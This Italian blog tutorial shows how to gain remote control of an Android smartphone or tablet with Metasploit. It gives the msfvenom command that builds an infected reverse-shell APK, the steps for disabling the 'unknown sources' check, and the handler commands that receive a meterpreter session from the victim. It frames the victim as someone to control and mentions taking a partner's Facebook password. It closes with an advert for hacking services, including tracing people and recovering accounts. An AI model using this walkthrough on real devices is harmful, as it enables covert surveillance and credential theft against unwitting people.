Hacking di uno smartphone o di un tablet Android con Metasploit

Nelle guide passate della rubrica su Metasploit Framework, abbiamo analizzato varie possibilità di azione del software, concentrandoci maggiormente sugli attacchi rivolti verso i PC Windows, eccetto in qualche caso. Negli ultimi anni, il mercato ha aperto le sue porte a smartphone e tablet, dispositivi che hanno guadagnato velocemente sempre più popolarità, surclassando i genitori computer soprattutto per quanto riguarda l’utilizzo della rete.

Per un hacker, come per una multinazionale, lasciarsi sfuggire questa importante fetta di mercato, equivarrebbe a rimanere indietro con i tempi, essendo inevitabilmente destinati a soccombere. È per tale motivo che in questo tutorial voglio riproporvi la prima guida della rubrica, rivisitata in chiave mobile.

Il procedimento non si differenzia di molto da quello descritto in precedenza, eccetto per un paio di passaggi dove la parola Android prenderà il posto della parola Windows.

Ricordiamoci che essendo puramente a scopo di test, questa guida trova ben poche applicazioni nel mondo reale. Del resto, in quanti pensate che possano avviare un programma o un’applicazione che non serve letteralmente a nulla, se non a concedere l’accesso ad estranei al proprio dispositivo? La risposta a questa domanda sarebbe più adatta ad un saggio sulla Social Engineering che sull’Exploitation, quindi concentriamoci su come guadagnare l’accesso al dispositivo mobile, più che sull’appropriarsi indebitamente della password di Facebook del proprio partner, non dimenticando il fatto che, una volta ottenuto l’accesso remoto al dispositivo, il resto sarà un gioco da ragazzi.

Creare un apk infetto

Iniziamo creando un apk da installare sul dispositivo vittima. Apk (Android Package) è l’estensione che contraddistingue gli archivi delle applicazioni Android. Come per gli eseguibili di Windows, Metasploit mette a disposizione anche il modulo per la creazione di file apk. Digitiamo quindi da terminale o da msfconsole il seguente comando, che ci restituirà un file apk, pronto per essere scaricato e installato sul device vittima.

msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] -o [nome_file].apk

 

Hacking Android Metasploit - Creare payload file apk msfvenom

Il payload è pronto, non ci resta che portarlo sul dispositivo mobile.

Abilitare “Origini sconosciute” su Android

Attenzione: il file contenente il payload non risulta firmato, quindi dobbiamo disattivare il controllo delle fonti sicure per poter installare il file apk sul device. Per farlo andiamo su Impostazioni -> sicurezza e attiviamo la voce Origini sconosciute.

Abilitare origini sconosciute Android

Impostare l’handler

Disattivato il controllo delle fonti sicure sul dispositivo, avviamo msfconsole con il comando msfconsole e impostiamo un handler generico per android

use exploit/multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST [ip_macchina_attaccante] set LPORT [porta_per_la_connessione] run

 

Hacking Android Metasploit - Impostare handler

Scaricare e installare il payload

Passiamo sul dispositivo mobile, scarichiamo il file apk appena creato e lo installiamo. Non avendo un dispositivo Android a disposizione, mi sono appoggiato ad una macchina virtuale.

Hacking Android Metasploit - Download apk

Hacking Android Metasploit - Installare apk

Successo!!

Non appena la vittima avvia l’applicazione denominata MainActivity, lo smartphone o il tablet sono sotto il nostro controllo

Hacking Android Metasploit - Avviare MainActivity

Hacking Android Metasploit - Meterpreter sysinfo

Baty’s Base


Stai cercando prodotti per l’hacking, la sicurezza informatica e il penetration testing? Hai bisogno di bonificare il tuo smartphone, il tuo pc o il tuo sito da virus e malware? Devi rintracciare una persona o recuperare delle informazioni urgenti? Devi riprendere possesso di un account, una mail o di una password che ti hanno sottratto? Vuoi acquistare device già configurati per sperimentare tutte le tecniche di hacking in modo facile e veloce? Hai esigenze particolari in ambito software o hardware? Possiamo aiutarti!

Contattaci subito per avere un aiuto immediato : dettagliaci tramite mail o Whatsapp che tipo di supporto ti occorre e ti invieremo un riscontro immediato!

Compila e invia il modulo qui sotto per inviarci subito una richiesta di supporto

Scrivi il tuo indirizzo email qui

Scrivi qui come possiamo aiutarti - ti supportiamo immediatamente per ogni tua esigenza!

chevron_left
chevron_right